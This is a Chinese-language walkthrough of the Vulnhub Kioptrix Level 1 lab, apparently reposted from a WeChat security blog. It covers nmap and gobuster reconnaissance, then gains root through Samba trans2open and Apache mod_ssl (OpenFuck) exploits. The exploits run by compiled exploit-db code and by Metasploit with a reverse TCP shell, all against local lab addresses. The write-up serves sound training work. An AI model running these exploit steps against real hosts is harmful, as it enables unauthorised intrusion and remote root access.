0x01 靶机介绍
-
Name: Kioptrix: Level 1 (#1)
-
Date release: 17 Feb 2010
-
Author: Kioptrix
-
Series: Kioptrix
-
Web page: http://www.kioptrix.com/blog/?page_id=135
靶机下载地址:
https:
/
/www.vulnhub.com/entry
/kioptrix-level-1-1,22/
0x02 侦察
端口探测
首先使用 nmap 进行端口扫描
nmap
-p-
-sV
-sC
-A
192
.168
.0
.106
-oA
nmap_kioptrix-1
扫描结果显示目标开放了22、80、111、139、443和1024端口
80端口
访问http://192.168.0.106
为测试界面
目录扫描
使用 gobuster 进行目录扫描,成功发现目录manual
、usage
、mrtg
gobuster dir -u
http:
/
/192.168.0.106 -w /usr
/share/wordlists
/dirbuster/directory
-list-
2.3
-small.txt
访问manual
目录存在目录遍历
访问usage
目录为网站的使用情况
访问mrtg
目录为 MRTG 且版本为2.9.6
0x03 上线[root]
信息收集
使用 MSF 扫描 Samba 版本为2.2.1a
msfconsole
msf
> use auxiliary/scanner/smb/smb_version
msf
> set RHOSTS 192.168.0.106
msf
> run
使用 searchsploit 查找相关漏洞,成功发现存在多个远程代码执行漏洞
searchsploit
samba 2.2
cp
/usr/share/exploitdb/exploits/multiple/remote/10.c ./
Samba远程代码执行
编译并执行 EXP,成功拿到 root 用户权限
gcc
10.
c -o
exp
./
exp
-b
0
-v
192.168
.0
.106
Samba trans2open远程溢出
MSF利用
使用 MSF 进行漏洞利用,成功拿到root权限
msfconsole
msf
> use exploit/linux/samba/trans2open
msf
> set rhosts 192.168.0.106
msf
> set lhost 192.168.0.109
msf
> set payload linux/x86/shell/reverse_tcp
msf
> run
编译执行
复制 EXP 至本地目录
searchsploit
trans2open
cp
/usr/share/exploitdb/exploits/unix/remote/22469.c ./
编译并执行 EXP,成功拿到 root 用户权限
gcc
22469
.c -o exp1
./exp1 -t
192.168.0.106
Apache mod_ssl 远程溢出
进入http://192.168.0.106/manual/mod/mod_ssl/
发现mod_ssl
的版本为2.8
使用 OpenFuck 前提需安装libssl-dev
库
git clone https:
//github.com/heltonWernik/OpenFuck.git
apt-
get
install libssl-dev
编译 OpenFuck 并运行,提示不同系统所支持的偏移量
gcc
-o OpenFuck OpenFuck.c -lcrypto
./OpenFuck
靶机的 Apache 版本为1.3.20,操作系统为 RedHat,因此偏移量可使用0x6a
和0x6b
利用偏移量0x6b
成功拿到目标 root 权限
./
OpenFuck
0x6a
192.168
.
0.106
-
c
40
./
OpenFuck
0x6b
192.168
.
0.106
-
c
50
原文始发于微信公众号(狐狸说安全):Vulnhub Kioptrix-Level-1
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论